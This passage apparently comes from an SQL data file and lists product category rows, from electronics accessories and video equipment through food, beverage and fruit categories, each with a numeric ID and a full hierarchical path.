(1489, 1489, 0, 'Electronics > Electronics Accessories > Computer Components > Tablet Computer Parts'),
(1490, 1490, 0, 'Electronics > Electronics Accessories > Computer Components > Tablet Computer Parts > Tablet Computer Housings & Trim'),
(1491, 1491, 0, 'Electronics > Electronics Accessories > Computer Components > Tablet Computer Parts > Tablet Computer Replacement Speakers'),
(1492, 1492, 0, 'Electronics > Electronics Accessories > Computer Components > Tablet Computer Parts > Tablet Computer Screens & Screen Digitizers'),
(1493, 1493, 0, 'Electronics > Electronics Accessories > Computer Components > USB & FireWire Hubs'),
(1494, 1494, 0, 'Electronics > Electronics Accessories > Electronics Cleaners'),
(1495, 1495, 0, 'Electronics > Electronics Accessories > Electronics Films & Shields'),
(1496, 1496, 0, 'Electronics > Electronics Accessories > Electronics Films & Shields > Electronics Stickers & Decals'),
(1497, 1497, 0, 'Electronics > Electronics Accessories > Electronics Films & Shields > Keyboard Protectors'),
(1498, 1498, 0, 'Electronics > Electronics Accessories > Electronics Films & Shields > Privacy Filters'),
(1499, 1499, 0, 'Electronics > Electronics Accessories > Electronics Films & Shields > Screen Protectors'),
(1500, 1500, 0, 'Electronics > Electronics Accessories > Memory'),
(1501, 1501, 0, 'Electronics > Electronics Accessories > Memory > Cache Memory'),
(1502, 1502, 0, 'Electronics > Electronics Accessories > Memory > Flash Memory'),
(1503, 1503, 0, 'Electronics > Electronics Accessories > Memory > Flash Memory > Flash Memory Cards'),
(1504, 1504, 0, 'Electronics > Electronics Accessories > Memory > RAM'),
(1505, 1505, 0, 'Electronics > Electronics Accessories > Memory > ROM'),
(1506, 1506, 0, 'Electronics > Electronics Accessories > Memory > Video Memory'),
(1507, 1507, 0, 'Electronics > Electronics Accessories > Memory Accessories'),
(1508, 1508, 0, 'Electronics > Electronics Accessories > Memory Accessories > Memory Cases'),
(1509, 1509, 0, 'Electronics > Electronics Accessories > Mobile Phone & Tablet Tripods & Monopods'),
(1510, 1510, 0, 'Electronics > Electronics Accessories > Power'),
(1511, 1511, 0, 'Electronics > Electronics Accessories > Power > Batteries'),
(1512, 1512, 0, 'Electronics > Electronics Accessories > Power > Batteries > Camera Batteries'),
(1513, 1513, 0, 'Electronics > Electronics Accessories > Power > Batteries > Cordless Phone Batteries'),
(1514, 1514, 0, 'Electronics > Electronics Accessories > Power > Batteries > E-Book Reader Batteries'),
(1515, 1515, 0, 'Electronics > Electronics Accessories > Power > Batteries > General Purpose Batteries'),
(1516, 1516, 0, 'Electronics > Electronics Accessories > Power > Batteries > Laptop Batteries'),
(1517, 1517, 0, 'Electronics > Electronics Accessories > Power > Batteries > MP3 Player Batteries'),
(1518, 1518, 0, 'Electronics > Electronics Accessories > Power > Batteries > Mobile Phone Batteries'),
(1519, 1519, 0, 'Electronics > Electronics Accessories > Power > Batteries > PDA Batteries'),
(1520, 1520, 0, 'Electronics > Electronics Accessories > Power > Batteries > Tablet Computer Batteries'),
(1521, 1521, 0, 'Electronics > Electronics Accessories > Power > Batteries > UPS Batteries'),
(1522, 1522, 0, 'Electronics > Electronics Accessories > Power > Batteries > Video Camera Batteries'),
(1523, 1523, 0, 'Electronics > Electronics Accessories > Power > Batteries > Video Game Console & Controller Batteries'),
(1524, 1524, 0, 'Electronics > Electronics Accessories > Power > Battery Accessories'),
(1525, 1525, 0, 'Electronics > Electronics Accessories > Power > Battery Accessories > Battery Charge Controllers'),
(1526, 1526, 0, 'Electronics > Electronics Accessories > Power > Battery Accessories > Battery Holders'),
(1527, 1527, 0, 'Electronics > Electronics Accessories > Power > Battery Accessories > Camera Battery Chargers'),
(1528, 1528, 0, 'Electronics > Electronics Accessories > Power > Battery Accessories > General Purpose Battery Chargers'),
(1529, 1529, 0, 'Electronics > Electronics Accessories > Power > Battery Accessories > General Purpose Battery Testers'),
(1530, 1530, 0, 'Electronics > Electronics Accessories > Power > Fuel Cells'),
(1531, 1531, 0, 'Electronics > Electronics Accessories > Power > Power Adapter & Charger Accessories'),
(1532, 1532, 0, 'Electronics > Electronics Accessories > Power > Power Adapters & Chargers'),
(1533, 1533, 0, 'Electronics > Electronics Accessories > Power > Power Control Units'),
(1534, 1534, 0, 'Electronics > Electronics Accessories > Power > Power Strips & Surge Suppressors'),
(1535, 1535, 0, 'Electronics > Electronics Accessories > Power > Power Supply Enclosures'),
(1536, 1536, 0, 'Electronics > Electronics Accessories > Power > Surge Protection Devices'),
(1537, 1537, 0, 'Electronics > Electronics Accessories > Power > Travel Converters & Adapters'),
(1538, 1538, 0, 'Electronics > Electronics Accessories > Power > UPS'),
(1539, 1539, 0, 'Electronics > Electronics Accessories > Power > UPS Accessories'),
(1540, 1540, 0, 'Electronics > Electronics Accessories > Remote Controls'),
(1541, 1541, 0, 'Electronics > Electronics Accessories > Signal Boosters'),
(1542, 1542, 0, 'Electronics > Electronics Accessories > Signal Jammers'),
(1543, 1543, 0, 'Electronics > Electronics Accessories > Signal Jammers > GPS Jammers'),
(1544, 1544, 0, 'Electronics > Electronics Accessories > Signal Jammers > Mobile Phone Jammers'),
(1545, 1545, 0, 'Electronics > Electronics Accessories > Signal Jammers > Radar Jammers'),
(1546, 1546, 0, 'Electronics > GPS Accessories'),
(1547, 1547, 0, 'Electronics > GPS Accessories > GPS Cases'),
(1548, 1548, 0, 'Electronics > GPS Accessories > GPS Mounts'),
(1549, 1549, 0, 'Electronics > GPS Navigation Systems'),
(1550, 1550, 0, 'Electronics > GPS Tracking Devices'),
(1551, 1551, 0, 'Electronics > Marine Electronics'),
(1552, 1552, 0, 'Electronics > Marine Electronics > Fish Finders'),
(1553, 1553, 0, 'Electronics > Marine Electronics > Marine Audio & Video Receivers'),
(1554, 1554, 0, 'Electronics > Marine Electronics > Marine Chartplotters & GPS'),
(1555, 1555, 0, 'Electronics > Marine Electronics > Marine Radar'),
(1556, 1556, 0, 'Electronics > Marine Electronics > Marine Radios'),
(1557, 1557, 0, 'Electronics > Marine Electronics > Marine Speakers'),
(1558, 1558, 0, 'Electronics > Networking'),
(1559, 1559, 0, 'Electronics > Networking > Bridges & Routers'),
(1560, 1560, 0, 'Electronics > Networking > Bridges & Routers > Network Bridges'),
(1561, 1561, 0, 'Electronics > Networking > Bridges & Routers > VoIP Gateways & Routers'),
(1562, 1562, 0, 'Electronics > Networking > Bridges & Routers > Wireless Access Points'),
(1563, 1563, 0, 'Electronics > Networking > Bridges & Routers > Wireless Routers'),
(1564, 1564, 0, 'Electronics > Networking > Concentrators & Multiplexers'),
(1565, 1565, 0, 'Electronics > Networking > Hubs & Switches'),
(1566, 1566, 0, 'Electronics > Networking > Modem Accessories'),
(1567, 1567, 0, 'Electronics > Networking > Modems'),
(1568, 1568, 0, 'Electronics > Networking > Network Cards & Adapters'),
(1569, 1569, 0, 'Electronics > Networking > Network Security & Firewall Devices'),
(1570, 1570, 0, 'Electronics > Networking > Power Over Ethernet Adapters'),
(1571, 1571, 0, 'Electronics > Networking > Print Servers'),
(1572, 1572, 0, 'Electronics > Networking > Repeaters & Transceivers'),
(1573, 1573, 0, 'Electronics > Print, Copy, Scan & Fax'),
(1574, 1574, 0, 'Electronics > Print, Copy, Scan & Fax > 3D Printer Accessories'),
(1575, 1575, 0, 'Electronics > Print, Copy, Scan & Fax > 3D Printers'),
(1576, 1576, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories'),
(1577, 1577, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Consumables'),
(1578, 1578, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Consumables > Printer Drums & Drum Kits'),
(1579, 1579, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Consumables > Printer Filters'),
(1580, 1580, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Consumables > Printer Maintenance Kits'),
(1581, 1581, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Consumables > Printer Ribbons'),
(1582, 1582, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Consumables > Printheads'),
(1583, 1583, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Consumables > Toner & Inkjet Cartridge Refills'),
(1584, 1584, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Consumables > Toner & Inkjet Cartridges'),
(1585, 1585, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Duplexers'),
(1586, 1586, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Memory'),
(1587, 1587, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer Stands'),
(1588, 1588, 0, 'Electronics > Print, Copy, Scan & Fax > Printer, Copier & Fax Machine Accessories > Printer, Copier & Fax Machine Replacement Parts'),
(1589, 1589, 0, 'Electronics > Print, Copy, Scan & Fax > Printers, Copiers & Fax Machines'),
(1590, 1590, 0, 'Electronics > Print, Copy, Scan & Fax > Scanner Accessories'),
(1591, 1591, 0, 'Electronics > Print, Copy, Scan & Fax > Scanners'),
(1592, 1592, 0, 'Electronics > Radar Detectors'),
(1593, 1593, 0, 'Electronics > Speed Radars'),
(1594, 1594, 0, 'Electronics > Toll Collection Devices'),
(1595, 1595, 0, 'Electronics > Video'),
(1596, 1596, 0, 'Electronics > Video > Computer Monitors'),
(1597, 1597, 0, 'Electronics > Video > Projectors'),
(1598, 1598, 0, 'Electronics > Video > Projectors > Multimedia Projectors'),
(1599, 1599, 0, 'Electronics > Video > Projectors > Overhead Projectors'),
(1600, 1600, 0, 'Electronics > Video > Projectors > Slide Projectors'),
(1601, 1601, 0, 'Electronics > Video > Satellite & Cable TV'),
(1602, 1602, 0, 'Electronics > Video > Satellite & Cable TV > Cable TV Receivers'),
(1603, 1603, 0, 'Electronics > Video > Satellite & Cable TV > Satellite Receivers'),
(1604, 1604, 0, 'Electronics > Video > Televisions'),
(1605, 1605, 0, 'Electronics > Video > Video Accessories'),
(1606, 1606, 0, 'Electronics > Video > Video Accessories > 3D Glasses'),
(1607, 1607, 0, 'Electronics > Video > Video Accessories > Computer Monitor Accessories'),
(1608, 1608, 0, 'Electronics > Video > Video Accessories > Computer Monitor Accessories > Color Calibrators'),
(1609, 1609, 0, 'Electronics > Video > Video Accessories > Projector Accessories'),
(1610, 1610, 0, 'Electronics > Video > Video Accessories > Projector Accessories > Projection & Tripod Skirts'),
(1611, 1611, 0, 'Electronics > Video > Video Accessories > Projector Accessories > Projection Screen Stands'),
(1612, 1612, 0, 'Electronics > Video > Video Accessories > Projector Accessories > Projection Screens'),
(1613, 1613, 0, 'Electronics > Video > Video Accessories > Projector Accessories > Projector Mounts'),
(1614, 1614, 0, 'Electronics > Video > Video Accessories > Projector Accessories > Projector Replacement Lamps'),
(1615, 1615, 0, 'Electronics > Video > Video Accessories > Rewinders'),
(1616, 1616, 0, 'Electronics > Video > Video Accessories > Television Parts & Accessories'),
(1617, 1617, 0, 'Electronics > Video > Video Accessories > Television Parts & Accessories > TV & Monitor Mounts'),
(1618, 1618, 0, 'Electronics > Video > Video Accessories > Television Parts & Accessories > TV Converter Boxes'),
(1619, 1619, 0, 'Electronics > Video > Video Accessories > Television Parts & Accessories > TV Replacement Lamps'),
(1620, 1620, 0, 'Electronics > Video > Video Accessories > Television Parts & Accessories > TV Replacement Speakers'),
(1621, 1621, 0, 'Electronics > Video > Video Editing Hardware & Production Equipment'),
(1622, 1622, 0, 'Electronics > Video > Video Multiplexers'),
(1623, 1623, 0, 'Electronics > Video > Video Players & Recorders'),
(1624, 1624, 0, 'Electronics > Video > Video Players & Recorders > DVD & Blu-ray Players'),
(1625, 1625, 0, 'Electronics > Video > Video Players & Recorders > DVD Recorders'),
(1626, 1626, 0, 'Electronics > Video > Video Players & Recorders > Digital Video Recorders'),
(1627, 1627, 0, 'Electronics > Video > Video Players & Recorders > Streaming & Home Media Players'),
(1628, 1628, 0, 'Electronics > Video > Video Players & Recorders > VCRs'),
(1629, 1629, 0, 'Electronics > Video > Video Servers'),
(1630, 1630, 0, 'Electronics > Video > Video Transmitters'),
(1631, 1631, 0, 'Electronics > Video Game Console Accessories'),
(1632, 1632, 0, 'Electronics > Video Game Console Accessories > Home Game Console Accessories'),
(1633, 1633, 0, 'Electronics > Video Game Console Accessories > Portable Game Console Accessories'),
(1634, 1634, 0, 'Electronics > Video Game Consoles'),
(1635, 1635, 0, 'Food, Beverages & Tobacco'),
(1636, 1636, 0, 'Food, Beverages & Tobacco > Beverages'),
(1637, 1637, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages'),
(1638, 1638, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Beer'),
(1639, 1639, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Bitters'),
(1640, 1640, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Cocktail Mixes'),
(1641, 1641, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Flavored Alcoholic Beverages'),
(1642, 1642, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Hard Cider'),
(1643, 1643, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits'),
(1644, 1644, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Absinthe'),
(1645, 1645, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Brandy'),
(1646, 1646, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Gin'),
(1647, 1647, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Liqueurs'),
(1648, 1648, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Rum'),
(1649, 1649, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Shochu & Soju'),
(1650, 1650, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Tequila'),
(1651, 1651, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Vodka'),
(1652, 1652, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Liquor & Spirits > Whiskey'),
(1653, 1653, 0, 'Food, Beverages & Tobacco > Beverages > Alcoholic Beverages > Wine'),
(1654, 1654, 0, 'Food, Beverages & Tobacco > Beverages > Buttermilk'),
(1655, 1655, 0, 'Food, Beverages & Tobacco > Beverages > Coffee'),
(1656, 1656, 0, 'Food, Beverages & Tobacco > Beverages > Eggnog'),
(1657, 1657, 0, 'Food, Beverages & Tobacco > Beverages > Fruit Flavored Drinks'),
(1658, 1658, 0, 'Food, Beverages & Tobacco > Beverages > Hot Chocolate'),
(1659, 1659, 0, 'Food, Beverages & Tobacco > Beverages > Juice'),
(1660, 1660, 0, 'Food, Beverages & Tobacco > Beverages > Milk'),
(1661, 1661, 0, 'Food, Beverages & Tobacco > Beverages > Non-Dairy Milk'),
(1662, 1662, 0, 'Food, Beverages & Tobacco > Beverages > Powdered Beverage Mixes'),
(1663, 1663, 0, 'Food, Beverages & Tobacco > Beverages > Soda'),
(1664, 1664, 0, 'Food, Beverages & Tobacco > Beverages > Sports & Energy Drinks'),
(1665, 1665, 0, 'Food, Beverages & Tobacco > Beverages > Tea & Infusions'),
(1666, 1666, 0, 'Food, Beverages & Tobacco > Beverages > Vinegar Drinks'),
(1667, 1667, 0, 'Food, Beverages & Tobacco > Beverages > Water'),
(1668, 1668, 0, 'Food, Beverages & Tobacco > Food Items'),
(1669, 1669, 0, 'Food, Beverages & Tobacco > Food Items > Bakery'),
(1670, 1670, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Bagels'),
(1671, 1671, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Bakery Assortments'),
(1672, 1672, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Breads & Buns'),
(1673, 1673, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Cakes & Dessert Bars'),
(1674, 1674, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Coffee Cakes'),
(1675, 1675, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Cookies'),
(1676, 1676, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Cupcakes'),
(1677, 1677, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Donuts'),
(1678, 1678, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Fudge'),
(1679, 1679, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Ice Cream Cones'),
(1680, 1680, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Muffins'),
(1681, 1681, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Pastries & Scones'),
(1682, 1682, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Pies & Tarts'),
(1683, 1683, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Taco Shells & Tostadas'),
(1684, 1684, 0, 'Food, Beverages & Tobacco > Food Items > Bakery > Tortillas & Wraps'),
(1685, 1685, 0, 'Food, Beverages & Tobacco > Food Items > Candied & Chocolate Covered Fruit'),
(1686, 1686, 0, 'Food, Beverages & Tobacco > Food Items > Candy & Chocolate'),
(1687, 1687, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces'),
(1688, 1688, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Cocktail Sauce'),
(1689, 1689, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Curry Sauce'),
(1690, 1690, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Dessert Toppings'),
(1691, 1691, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Dessert Toppings > Fruit Toppings'),
(1692, 1692, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Dessert Toppings > Ice Cream Syrup'),
(1693, 1693, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Fish Sauce'),
(1694, 1694, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Gravy'),
(1695, 1695, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Honey'),
(1696, 1696, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Horseradish Sauce'),
(1697, 1697, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Hot Sauce'),
(1698, 1698, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Ketchup'),
(1699, 1699, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Marinades & Grilling Sauces'),
(1700, 1700, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Mayonnaise'),
(1701, 1701, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Mustard'),
(1702, 1702, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Olives & Capers'),
(1703, 1703, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Pasta Sauce'),
(1704, 1704, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Pickled Fruits & Vegetables'),
(1705, 1705, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Pizza Sauce'),
(1706, 1706, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Relish & Chutney'),
(1707, 1707, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Salad Dressing'),
(1708, 1708, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Satay Sauce'),
(1709, 1709, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Soy Sauce'),
(1710, 1710, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Sweet and Sour Sauces'),
(1711, 1711, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Syrup'),
(1712, 1712, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Tahini'),
(1713, 1713, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Tartar Sauce'),
(1714, 1714, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > White & Cream Sauces'),
(1715, 1715, 0, 'Food, Beverages & Tobacco > Food Items > Condiments & Sauces > Worcestershire Sauce'),
(1716, 1716, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients'),
(1717, 1717, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Baking Chips'),
(1718, 1718, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Baking Chocolate'),
(1719, 1719, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Baking Flavors & Extracts'),
(1720, 1720, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Baking Mixes'),
(1721, 1721, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Baking Powder'),
(1722, 1722, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Baking Soda'),
(1723, 1723, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Batter & Coating Mixes'),
(1724, 1724, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Bean Paste'),
(1725, 1725, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Bread Crumbs'),
(1726, 1726, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Canned & Dry Milk'),
(1727, 1727, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Cookie Decorating Kits'),
(1728, 1728, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Cooking Oils'),
(1729, 1729, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Cooking Starch'),
(1730, 1730, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Cooking Wine'),
(1731, 1731, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Corn Syrup'),
(1732, 1732, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Dough'),
(1733, 1733, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Dough > Bread & Pastry Dough'),
(1734, 1734, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Dough > Cookie & Brownie Dough'),
(1735, 1735, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Dough > Pie Crusts'),
(1736, 1736, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Edible Baking Decorations'),
(1737, 1737, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Floss Sugar'),
(1738, 1738, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Flour'),
(1739, 1739, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Food Coloring'),
(1740, 1740, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Frosting & Icing'),
(1741, 1741, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Lemon & Lime Juice'),
(1742, 1742, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Marshmallows'),
(1743, 1743, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Meal'),
(1744, 1744, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Molasses'),
(1745, 1745, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Pie & Pastry Fillings'),
(1746, 1746, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Shortening & Lard'),
(1747, 1747, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Starter Cultures'),
(1748, 1748, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Sugar & Sweeteners'),
(1749, 1749, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Tapioca Pearls'),
(1750, 1750, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Tomato Paste'),
(1751, 1751, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Unflavored Gelatin'),
(1752, 1752, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Vinegar'),
(1753, 1753, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Waffle & Pancake Mixes'),
(1754, 1754, 0, 'Food, Beverages & Tobacco > Food Items > Cooking & Baking Ingredients > Yeast'),
(1755, 1755, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products'),
(1756, 1756, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products > Butter & Margarine'),
(1757, 1757, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products > Cheese'),
(1758, 1758, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products > Coffee Creamer'),
(1759, 1759, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products > Cottage Cheese'),
(1760, 1760, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products > Cream'),
(1761, 1761, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products > Sour Cream'),
(1762, 1762, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products > Whipped Cream'),
(1763, 1763, 0, 'Food, Beverages & Tobacco > Food Items > Dairy Products > Yogurt'),
(1764, 1764, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads'),
(1765, 1765, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Apple Butter'),
(1766, 1766, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Cheese Dips & Spreads'),
(1767, 1767, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Cream Cheese'),
(1768, 1768, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Guacamole'),
(1769, 1769, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Hummus'),
(1770, 1770, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Jams & Jellies'),
(1771, 1771, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Nut Butters'),
(1772, 1772, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Salsa'),
(1773, 1773, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Tapenade'),
(1774, 1774, 0, 'Food, Beverages & Tobacco > Food Items > Dips & Spreads > Vegetable Dip'),
(1775, 1775, 0, 'Food, Beverages & Tobacco > Food Items > Food Gift Baskets'),
(1776, 1776, 0, 'Food, Beverages & Tobacco > Food Items > Frozen Desserts & Novelties'),
(1777, 1777, 0, 'Food, Beverages & Tobacco > Food Items > Frozen Desserts & Novelties > Ice Cream & Frozen Yogurt'),
(1778, 1778, 0, 'Food, Beverages & Tobacco > Food Items > Frozen Desserts & Novelties > Ice Cream Novelties'),
(1779, 1779, 0, 'Food, Beverages & Tobacco > Food Items > Frozen Desserts & Novelties > Ice Pops'),
(1780, 1780, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables'),
(1781, 1781, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Canned & Jarred Fruits'),
(1782, 1782, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Canned & Jarred Vegetables'),
(1783, 1783, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Canned & Prepared Beans'),
(1784, 1784, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Dried Fruits'),
(1785, 1785, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Dried Vegetables'),
(1786, 1786, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Dry Beans'),
(1787, 1787, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits'),
(1788, 1788, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Apples'),
(1789, 1789, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Atemoyas'),
(1790, 1790, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Avocados'),
(1791, 1791, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Babacos'),
(1792, 1792, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Bananas'),
(1793, 1793, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Berries'),
(1794, 1794, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Breadfruit'),
(1795, 1795, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Cactus Pears'),
(1796, 1796, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Cherimoyas'),
(1797, 1797, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Citrus Fruits'),
(1798, 1798, 0, 'Food, Beverages & Tobacco > Food Items > Fruits & Vegetables > Fresh & Frozen Fruits > Citrus Fruits > Grapefruits'),
